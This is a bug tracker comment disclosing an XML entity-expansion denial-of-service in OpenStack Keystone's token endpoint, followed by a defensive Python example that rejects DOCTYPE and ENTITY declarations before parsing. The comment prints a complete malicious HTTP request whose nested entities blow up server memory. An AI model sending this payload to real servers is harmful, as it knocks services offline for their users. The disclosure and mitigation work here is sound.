Comment 0 for bug 1100282

Thierry Carrez (ttx) wrote : DoS through XML entity expansion

Jonathan Murray from NCC Group reported that you can DoS keystone servers using XML entities in Keystone requests:

POST /v2.0/tokens HTTP/1.1
content-type: application/xml

<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>

In that precise case it might be an issue with the XML library we use, although it sounds generally safer to disable parsing ENTITY blocks entirely if we can.
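
One way to refuse ENTITY blocks before they are expanded, as suggested above. This is an added example, not part of the original report and not Keystone's code: it uses Python's standard-library expat bindings, and the names `parse_request_body`, `ForbiddenXML` and `is_accepted` and both sample bodies are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """The request body declared a DOCTYPE or an entity."""


def _reject(kind):
    def handler(*_args):
        raise ForbiddenXML(f"{kind} declarations are not accepted")
    return handler


def parse_request_body(body: bytes) -> ET.Element:
    """Build an element tree from body, refusing any DTD before it is processed."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()
    # expat fires these as soon as it sees <!DOCTYPE / <!ENTITY, so the
    # exception aborts parsing before any entity reference is expanded.
    parser.StartDoctypeDeclHandler = _reject("DOCTYPE")
    parser.EntityDeclHandler = _reject("ENTITY")
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(body, True)
    return builder.close()


# Constructed sample bodies (not captured traffic).
BENIGN = b"<auth><tenantName>demo</tenantName></auth>"
WITH_ENTITIES = (
    b'<!DOCTYPE foo [<!ENTITY a "AAAA"><!ENTITY b "&a;&a;">]>'
    b"<auth><tenantName>&b;</tenantName></auth>"
)


def is_accepted(body: bytes) -> bool:
    """True if the body parses without declaring a DTD or entities."""
    try:
        parse_request_body(body)
    except ForbiddenXML:
        return False
    return True


if __name__ == "__main__":
    print(is_accepted(BENIGN), is_accepted(WITH_ENTITIES))
```

Malformed XML still raises `expat.ExpatError`, which the caller should map to a 400 response alongside `ForbiddenXML`.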